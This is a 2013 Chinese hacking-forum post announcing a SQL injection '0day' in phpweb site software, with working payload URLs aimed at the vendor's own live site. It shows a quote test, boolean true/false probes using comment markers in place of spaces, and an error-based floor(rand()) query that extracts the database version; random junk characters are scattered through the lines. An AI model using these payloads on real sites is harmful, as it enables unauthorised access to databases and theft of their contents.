找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2394|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入2 T! c/ ]! L! S6 A! d

! F+ e/ s1 V+ F; s$ \主站:http://phpweb.net/
3 a& W" p& G: ~, d$ |加’检测:
6 B; D7 x7 Q; C# P) N! g/ L 8 d  P& T8 ?4 c8 l4 O# B
http://www.phpweb.net/down/html/?772′.html
0 T) G7 |1 L5 M  E
  z6 M3 T+ M" H7 [. ]出错/ Q8 G" w9 Z' O. l
存在注入。
/ }1 [; l. F+ Q' E不能用空格,只能用/*罗7 U! C$ ~, a  r1 E# }
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常. T0 J: V; w0 J6 R6 q# U3 d  E

" w# D" t) ]0 M9 [http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
3 M; J, c- _2 l  E/ u' ^# ~6 A爆数据库版本:
! w9 E# K3 F' l) h! X3 T . [0 n- ]  o5 Q# W, u8 q9 P
?8 p/ [, Y% e' Y# x1 J0 L+ [- `
1
- M9 ~, c1 e' Shttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
6 _1 l  o- h0 X更新日期: 2013-01-03 13:39:50        
. ]1 [" d: r; s4 t, D0 Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表